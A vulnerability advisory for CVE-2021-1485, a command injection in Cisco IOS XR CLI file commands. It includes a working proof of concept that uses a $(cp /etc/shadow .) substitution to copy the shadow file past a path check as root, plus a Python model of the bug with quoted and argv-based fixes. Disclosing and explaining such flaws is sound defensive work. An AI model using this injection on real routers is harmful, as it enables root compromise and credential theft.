CVE: CVE-2021-1485

Tested Versions:

  • Cisco IOS XRv 64 bit 7.0.2

Product URL(s): https://cisco.com

Description of the vulnerability

Several router CLI commands are implemented as passthroughs to the underlying Linux shell: the CLI builds a command line from the user-supplied argument and hands it to sh -c. Testing shows that the argument is not quoted or escaped correctly before it is inserted into that command line. Passing a lone single quote, for example, produces shell syntax errors (the "sh: -c:" messages below come from the shell, not from the CLI) before the CLI reports its own error:

RP/0/RSP0/CPU0# dir "'"
sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file
dir : ' : Path does not exist

An unescaped argument inside a shell command line is the classic precondition for command injection: shell metacharacters and command substitutions in the argument are interpreted by sh. A user confined to the restricted CLI, which offers no direct shell access, can therefore get arbitrary commands executed on the underlying OS.

Technical Details

The CLI does restrict the paths these commands may operate on (reading /etc/shadow directly is refused with "Path outside filesystem disallowing access"), but the restriction only governs which file the command is ultimately given. It does nothing about a command substitution embedded in the argument: the shell expands $(...) when it parses the command line, so the embedded command runs regardless of which path the check later accepts or rejects.

Because the passthrough commands run as root, anyone with access to these CLI commands can run arbitrary commands as root and compromise the host OS.

Here’s a PoC illustrating this issue:

RP/0/RSP0/CPU0# more /etc/shadow
more : /etc/shadow : Path outside filesystem disallowing access

RP/0/RSP0/CPU0# more "$(cp /etc/shadow .)"
/misc/scratch/ is a directory

RP/0/RSP0/CPU0# more shadow
root:*:18298:0:99999:7:::
daemon:*:18298:0:99999:7:::
bin:*:18298:0:99999:7:::
sys:*:18298:0:99999:7:::
sync:*:18298:0:99999:7:::
games:*:18298:0:99999:7:::
man:*:18298:0:99999:7:::
lp:*:18298:0:99999:7:::
mail:*:18298:0:99999:7:::
news:*:18298:0:99999:7:::
uucp:*:18298:0:99999:7:::
proxy:*:18298:0:99999:7:::
www-data:*:18298:0:99999:7:::
backup:*:18298:0:99999:7:::
list:*:18298:0:99999:7:::
irc:*:18298:0:99999:7:::
gnats:*:18298:0:99999:7:::
nobody:*:18298:0:99999:7:::
sshd:!:18298::::::
messagebus:!:18298::::::
rpc:!:18298::::::

In the PoC, the direct read is refused by the path check. The second command embeds cp /etc/shadow . in a command substitution: the shell runs the copy as root, the substitution evidently expands to an empty string, and more ends up pointed at the CLI's working directory, /misc/scratch/ (hence the "is a directory" message). The copy now sits in an approved location, and the third command reads it normally.

The same passthrough handling is used by dir, more, mkdir and delete, so all four commands are affected.
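The passthrough pattern behind this bug, as an added example written for this page (Python; it is not Cisco's code and makes no claim about how IOS XR is implemented): a hypothetical CLI "more" whose path check approves the argument as typed and which then interpolates it unquoted into sh -c, beside two fixed variants. A temporary directory stands in for /misc/scratch, a harmless constructed payload stands in for $(cp /etc/shadow .), and the file names, function names and error string are assumptions for illustration.

```python
"""Added example: a minimal model of a CLI file command implemented as a
passthrough to sh -c, in the vulnerable shape described above and in two
hardened shapes. Hypothetical code for illustration, not Cisco's
implementation; a temporary directory stands in for /misc/scratch."""
import os
import shlex
import subprocess
import tempfile


def path_allowed(arg: str, root: str) -> bool:
    """Approve only arguments that resolve to a path inside `root`.
    Relative arguments are taken relative to `root` (the CLI's working
    directory); an absolute argument such as /etc/shadow is rejected."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, arg))
    return target == root or target.startswith(root + os.sep)


def _run(argv: list, root: str) -> tuple:
    """Execute argv with `root` as the working directory and return
    (exit status, combined output). stdin is closed so `cat` with no
    operand cannot block."""
    p = subprocess.run(argv, cwd=root, stdin=subprocess.DEVNULL,
                       capture_output=True, text=True)
    return p.returncode, p.stdout + p.stderr


def vulnerable_more(arg: str, root: str) -> tuple:
    """Vulnerable: the path check looks at the argument as typed, then the
    argument is interpolated unquoted into a shell command line. The check
    sees nothing wrong with "$(cp /etc/shadow .)", and sh runs the
    substitution before `cat` ever sees a path."""
    if not path_allowed(arg, root):
        return 1, "Path outside filesystem disallowing access"
    return _run(["sh", "-c", "cat " + arg], root)   # unquoted: the bug


def quoted_more(arg: str, root: str) -> tuple:
    """Hardened (if a shell really is required): shlex.quote turns the whole
    argument into a single-quoted literal, so $(...), quotes and ; are data."""
    if not path_allowed(arg, root):
        return 1, "Path outside filesystem disallowing access"
    return _run(["sh", "-c", "cat " + shlex.quote(arg)], root)


def hardened_more(arg: str, root: str) -> tuple:
    """Hardened (preferred): no shell at all. The argument travels as one
    argv element, so there is nothing to expand."""
    if not path_allowed(arg, root):
        return 1, "Path outside filesystem disallowing access"
    return _run(["cat", arg], root)


def demo() -> dict:
    """Feed each variant a constructed, harmless payload in a scratch
    directory standing in for /misc/scratch and report whether the
    embedded command ran (a marker file appears)."""
    payload = "$(echo injected > marker)"   # stand-in for $(cp /etc/shadow .)
    results = {}
    for name, fn in (("vulnerable", vulnerable_more),
                     ("quoted", quoted_more),
                     ("hardened", hardened_more)):
        with tempfile.TemporaryDirectory() as root:
            fn(payload, root)
            results[name] = os.path.exists(os.path.join(root, "marker"))
    with tempfile.TemporaryDirectory() as root:
        # Direct access outside the approved root is refused by the check
        # alone, which is what the PoC's first command shows.
        rc, out = vulnerable_more("/etc/shadow", root)
        results["outside_refused"] = out.startswith("Path outside")
        # The lone quote from the first transcript: the shell, not the CLI,
        # reports the error, which is how the unquoted interpolation shows up.
        rc, out = vulnerable_more("'", root)
        results["lone_quote_is_shell_error"] = rc != 0 and out.startswith("sh:")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see the marker file appear only for the vulnerable variant. The argv form is the fix to prefer: the path check is then applied to the very string the program receives, and there is no shell to expand anything. Quoting with shlex.quote is the fallback when a shell is genuinely needed, and the lone-quote case shows why hand-rolled quoting tends to go wrong.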

References:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xr-cmdinj-vsKGherc

Timeline:

  • 2020-06-12 Vendor disclosure
  • 2021-04-15 Vendor patched